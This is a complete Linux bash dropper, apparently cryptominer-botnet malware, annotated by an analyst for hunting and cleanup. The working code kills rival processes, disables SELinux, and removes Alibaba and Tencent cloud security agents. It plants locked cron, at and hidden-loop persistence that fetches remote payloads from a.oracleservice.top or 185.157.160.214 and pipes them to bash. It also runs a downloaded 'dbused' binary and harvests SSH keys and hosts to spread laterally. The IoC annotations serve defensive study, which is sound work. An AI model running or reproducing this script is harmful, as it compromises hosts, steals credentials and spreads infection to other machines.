#!/bin/bash
# Analyst annotation (defensive, written against the script as posted):
# this is a dropper/persistence script. In order it (1) kills processes that hold
# sockets on a list of ports/peers, (2) removes cloud-provider security agents,
# (3) writes several cron-based persistence entries that re-fetch "$url/xms",
# (4) picks a working directory and validates an existing "/tmp/dbused" by md5,
# then (below) fetches and runs "dbused" / "bashirc" and spreads over SSH with
# harvested keys. Every host, path, port and hash in these comments is taken
# from the script itself and is usable for hunting and cleanup.
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
# Switches SELinux to permissive (output suppressed); the mode change is
# visible in the audit log / "getenforce".
setenforce 0 2>/dev/null
# Raises the per-user process limit for this shell and its children.
ulimit -u 50000
# Sets vm.nr_hugepages to 3 x the number of "processor" lines in /proc/cpuinfo;
# the changed sysctl value persists until reboot and is a host-state indicator.
sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3))
# SIGKILLs every process that netstat shows with a socket on these ports
# (PID taken from netstat's PID/Program column). The port list is presumably a
# set of competing tools on the same host — inferred from the port numbers only,
# not established by the script. The last three lines target specific peer
# addresses (23.94.24.12:8080, 134.122.17.13:8080, 107.189.11.170:443).
netstat -antp | grep ':3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':4444' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5555' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':7777' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':14444' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5790' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':45700' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':2222' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':9999' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':20580' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':13531' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '23.94.24.12:8080' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
netstat -antp | grep '134.122.17.13:8080' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
netstat -antp | grep '107.189.11.170:443' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
# Two random values in 0..255; neither is referenced again in this script.
rand=$(seq 0 255 | sort -R | head -n1)
rand2=$(seq 0 255 | sort -R | head -n1)
# Clears the immutable (i) and append-only (a) attributes on the persistence
# files that are rewritten below and re-locked with "chattr +ai" at the end of
# the script. Cleanup of these files requires removing the attributes first.
chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down

# Security-agent removal. If a process matching "aliyun" exists, the Alibaba
# Cloud Aegis uninstall scripts are fetched from update.aegis.aliyun.com and
# piped to bash (and fetched again via lwp-download, Perl LWP, and run from
# /tmp/uninstall.sh); the remaining aliyun service files and the bcm-agent
# service/package are then removed. Otherwise, if a process matching "yunjing"
# exists, the Tencent Cloud (qcloud) vendor uninstall scripts are run.
# Absence of these agents after they were installed is itself an indicator.
if ps aux | grep -i '[a]liyun'; then
(wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
(wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
sleep 1
echo "DER Uninstalled"

# Earlier download hosts, left commented out by the author; url2 is pinned to
# the third of them. url2 is used below for the "dbused" and "bashirc" fetches.
#ar[0]="http://205.185.118.119"
#ar[1]="http://185.101.107.92"
#ar[2]="http://185.157.160.214"
#ran=$[$RANDOM % ${#ar[@]}]
#url2=${ar[$ran]}
url2="http://185.157.160.214"


# Primary payload host ($url): the domain a.oracleservice.top if a single ping
# produces a line containing "bytes of data", otherwise the IP fallback.
# NOTE(review): on Linux that string is in ping's header line, which appears as
# soon as the name resolves, so this is effectively a DNS-resolution check —
# confirm against the ping build on the affected host.
if [ $(ping -c 1 a.oracleservice.top 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];
then
url="http://a.oracleservice.top"
else
url="http://185.157.160.214"
fi


# Persistence, written as root: three /etc/cron.d files (root, apache, nginx)
# on 1/2/3-minute schedules, root's spool crontab at two paths, and an hourly
# script. Each entry re-fetches "$url/xms" with curl, wget or python2 urllib2
# and pipes it to bash, then tries lwp-download to "$DIR/xms" and runs that.
# DIR is not assigned until after this block (DIR="/tmp" below), so "$DIR/xms"
# in these files expands with an empty DIR, i.e. the literal path "/xms".
# The "\n##" leaves a trailing "##" line in each file, a handy hunting marker.
echo -e "*/1 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/root
echo -e "*/2 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/apache
echo -e "*/3 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/nginx
echo -e "*/30 * * * * (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * * (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
# The "| chmod" is a pipe, not a sequence: echo's stdout (already redirected to
# the file) feeds chmod, and chmod still runs, marking the hourly script 755.
echo "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1

# Working-directory selection; DIR is used by get()/judge()/cronbackup below.
DIR="/tmp"
cd $DIR

# If /tmp/dbused already exists and is a writable regular file, its md5 is
# compared with the two expected values. On any other value the script removes
# /usr/local/lib/libkk.so, empties /etc/ld.so.preload (the dynamic loader's
# preload list) and kills processes whose command line matches "wc.conf" or
# "susss". If /tmp/dbused exists but is not writable, a fresh mktemp directory
# is used instead. Either way nothing is downloaded in this block.
if [ -a "/tmp/dbused" ]
then
if [ -w "/tmp/dbused" ] && [ ! -d "/tmp/dbused" ]
then
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum /tmp/dbused | awk '{ print $1 }')
echo $sum
case $sum in
# Expected md5 values of the x86_64 "dbused" payload (IoCs).
dc3d2e17df6cef8df41ce8b0eba99291 | 780965bad574e4e7f04433431d0d8f63)
echo "x86_64 OK"
;;
*)
echo "x86_64 wrong"
rm -rf /usr/local/lib/libkk.so
echo "" > /etc/ld.so.preload
pkill -f wc.conf
pkill -f susss
sleep 4
;;
esac
fi
echo "P OK"
else
DIR=$(mktemp -d)/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
else
if [ -d "/tmp" ]
then
DIR="/tmp"
fi
echo "P NOT EXISTS"
fi
# A directory at /tmp/.sh/dbused also forces a fresh mktemp working directory.
if [ -d "/tmp/.sh/dbused" ]
then
DIR=$(mktemp -d)/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
  113.  
# get URL DEST — download helper used for "dbused" and "bashirc" below.
# Clears the immutable attribute on DEST and deletes it, then tries wget,
# curl and lwp-download (Perl LWP) in turn. The download line ends with "||",
# so "chmod +x $2" is the last alternative of that chain: it runs only when all
# three downloads failed. Callers therefore chmod the file themselves.
# Arguments are unquoted throughout.
get() {
chattr -i $2; rm -rf $2
wget -q -O - $1 > $2 || curl -fsSL $1 -o $2 || lwp-download $1 $2 ||
chmod +x $2
}
  119.  
  120.  
# downloadIfNeed — validates "$DIR/dbused" against the two expected md5 values
# and calls download() when the file is missing or the hash differs; without
# md5sum it calls download() unconditionally. On a hash mismatch it also
# records the "du" size of $DIR/x86_64 and $DIR/sssus and the md5 of
# $DIR/x86_64 into $DIR/tmp.txt (only when /usr/bin/curl exists). The WGET
# variable is assigned but not used anywhere in this script.
# This function is defined but never called in the script as posted.
downloadIfNeed()
{
if [ -x "$(command -v md5sum)" ]
then
if [ ! -f $DIR/dbused ]; then
echo "File not found!"
download
fi
sum=$(md5sum $DIR/dbused | awk '{ print $1 }')
echo $sum
case $sum in
# Expected md5 values of the x86_64 "dbused" payload (IoCs).
dc3d2e17df6cef8df41ce8b0eba99291 | 780965bad574e4e7f04433431d0d8f63)
echo "x86_64 OK"
;;
*)
echo "x86_64 wrong"
sizeBefore=$(du $DIR/x86_64)
if [ -s /usr/bin/curl ];
then
WGET="curl -k -o ";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget --no-check-certificate -O ";
fi
download
sumAfter=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
if [ -s /usr/bin/curl ];
then
# Leaves a record file ($DIR/tmp.txt) on disk — useful forensic artefact.
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sssus` > $DIR/tmp.txt
fi
;;
esac
else
echo "No md5sum"
download
fi
}
  159.  
  160.  
# download — checks a cached copy at "$DIR/x86_643": if its md5 matches the
# single expected value (listed twice in the case arm) it is copied to
# "$DIR/x86_64" (the cp is repeated), otherwise download2() fetches a fresh
# copy; without md5sum download2() is called directly.
# Only reachable from downloadIfNeed(), which is itself never called here.
download() {
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/x86_643 | awk '{ print $1 }')
echo $sum
case $sum in
dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)
echo "x86_64 OK"
cp $DIR/x86_643 $DIR/x86_64
cp $DIR/x86_643 $DIR/x86_64
;;
*)
echo "x86_64 wrong"
download2
;;
esac
else
echo "No md5sum"
download2
fi
}
  182.  
# download2 — fetches "$url/<uname -m>" into "$DIR/dbused" via get(), then, if
# md5sum is available and the hash matches one of the two expected values,
# copies "$DIR/x86_64" to "$DIR/x86_643" (the cache checked by download()).
# Note the copy reads $DIR/x86_64, not the file just downloaded.
# Only reachable from download().
download2() {
get $url/$(uname -m) "$DIR"/dbused
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/dbused | awk '{ print $1 }')
echo $sum
case $sum in
# Expected md5 values of the x86_64 "dbused" payload (IoCs).
dc3d2e17df6cef8df41ce8b0eba99291 | 780965bad574e4e7f04433431d0d8f63)
echo "x86_64 OK"
cp $DIR/x86_64 $DIR/x86_643
;;
*)
echo "x86_64 wrong"
;;
esac
else
echo "No md5sum"
fi
}
  202.  
# judge — if netstat shows no ESTABLISHED connection to any of the three
# peers 51.79.175.139:8080, 146.59.198.38:8080 or 167.114.114.169:8080, fetch
# "$url2/<uname -m>" into "$DIR/dbused", make it executable and run it twice:
# once with "-c $dns" and once with "-pwn". $dns is not assigned anywhere in
# this script, so "-c" receives an empty argument as posted (presumably set by
# a caller or an earlier stage — unconfirmed). The meaning of "-pwn" is not
# determinable from this script. Otherwise it only prints "Running".
# Those three peer addresses are the connection indicators for the payload.
judge() {
if [ ! "$(netstat -ant|grep '51.79.175.139:8080\|146.59.198.38:8080\|167.114.114.169:8080'|grep 'ESTABLISHED'|grep -v grep)" ];
then
get $url2/$(uname -m) "$DIR"/dbused
chmod +x "$DIR"/dbused
"$DIR"/dbused -c $dns
"$DIR"/dbused -pwn
else
echo "Running"
fi
}
  214.  
  215. if [ ! "$(netstat -ant|grep '51.79.175.139:8080\|146.59.198.38:8080\|167.114.114.169:8080'|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
  216. then
  217. judge
  218. else
  219. echo "Running"
  220. fi
  221.  
  222. if [ ! "$(netstat -ant|grep '51.255.171.23:443'|grep 'ESTABLISHED'|grep -v grep)" ];
  223. then
  224. get $url2/bashirc.$(uname -m) $DIR/bashirc; chmod +x $DIR/bashirc; $DIR/bashirc; rm -rf $DIR/bashirc
  225. fi
  226.  
  227.  
# cronbackup — fallback persistence when cron is unavailable. Determines status
# from systemd: cron or crond active -> nothing further; atd active -> status 1;
# none -> status 2. This $pay variant ends with "rm -rf $DIR" (the whole
# working directory), unlike the "rm -rf $DIR/xms" used in the cron entries.
cronbackup() {
pay="(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR"
status=0
crona=$(systemctl is-active cron)
cronb=$(systemctl is-active crond)
cronatd=$(systemctl is-active atd)
if [ "$crona" == "active" ] ; then
echo "cron okay"
elif [ "$cronb" == "active" ]; then
echo "cron okay"
elif [ "$cronatd" == "active" ] ; then
status=1
else
status=2
fi
# status 1: removes every queued "at" job of the current user, then queues the
# payload with at for one minute later (an at job is the artefact to look for).
if [ $status -eq 1 ] ; then
for a in $(at -l|awk '{print $1}'); do at -r $a; done
echo "$pay" | at -m now + 1 minute
fi
# status 2, or not running as root: $me is never assigned in this script, so
# as posted the second condition is always true and this branch always runs
# (presumably $me is set by a caller — unconfirmed). It writes a "while true;
# sleep 60; $pay" loop to a file named "cruner" in one of six directories chosen
# at random (/dev/shm, /tmp, /var/tmp, the user's home, /run/user/$UID and
# /run/user/$UID/systemd), kills any existing "cruner" processes, starts the
# new one detached with nohup and deletes the file 15 s later — the loop
# process outlives its deleted script, so look for it in the process list
# rather than on disk.
if [ $status -eq 2 ] || [ "$me" != "root" ] ;then
arr[0]="/dev/shm"
arr[1]="/tmp"
arr[2]="/var/tmp"
arr[3]="/home/$(whoami)"
arr[4]="/run/user/$(echo $UID)"
arr[5]="/run/user/$(echo $UID)/systemd"
rand=$[$RANDOM % ${#arr[@]}]
echo "Setting up custom backup"
ps auxf|grep -v grep|grep "cruner" | awk '{print $2}'|xargs kill -9
key="while true; do sleep 60 && $pay; done"
echo -e "$key\n##" > ${arr[$rand]}/cruner && chmod 777 ${arr[$rand]}/cruner
nohup ${arr[$rand]}/cruner >/dev/null 2>&1 &
sleep 15
rm -rf ${arr[$rand]}/cruner
fi
}
cronbackup


# User crontab: if the current user's crontab does not already mention $url,
# the existing crontab is wiped ("crontab -r") and replaced with a single
# every-minute entry running the same xms payload. Loss of legitimate user
# cron jobs is a side effect worth checking for during recovery.
if crontab -l | grep -q "$url"
then
echo "Cron exists"
else
crontab -r
echo "Cron not found"
echo "* * * * * (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" | crontab -
fi

# SSH lateral movement. Credential and target harvesting, all read-only:
#  KEYS   - id_rsa* files (excluding *.pub) up to 2 levels under ~, /root, /home
#  KEYS2  - IdentityFile entries from every reachable ssh config
#  KEYS3  - *.pem files up to 3 levels deep
#  HOSTS  - HostName entries from ssh configs
#  HOSTS2 - IPv4 addresses on ssh/scp lines of bash histories
#  HOSTS3 - IPv4 addresses from known_hosts files
#  USERZ  - "root" plus user names taken from the path component of id_rsa
#           files found under .ssh directories
KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
USERZ=$(
echo "root"
find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v "\.ssh"
)
# Each list is de-duplicated while keeping first-seen order (nl / sort -u -k2 /
# sort -n / cut); 127.0.0.1 is dropped from the host list.
userlist=$(echo $USERZ | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
# Tries every user x host x key combination with host-key checking disabled,
# BatchMode (no prompts) and a 5 s connect timeout, and runs the xms payload on
# any host that accepts the key. Each attempt shows up in the target's SSH
# auth log; on the source host, harvested keys get their mode rewritten to 400
# (a ctime change on the key files).
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
chmod +r $key; chmod 400 $key
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms"
done
done
done

# Cleanup of staging files (2start.jpg is not written anywhere in this script),
# then the cron persistence files are locked with immutable + append-only
# attributes; "chattr -ia" is required before they can be edited or removed.
# /etc/init.d/down is listed here and in the unlock at the top but is never
# created by this script.
rm -rf "$DIR"/2start.jpg
rm -rf "$DIR"/xms
chattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down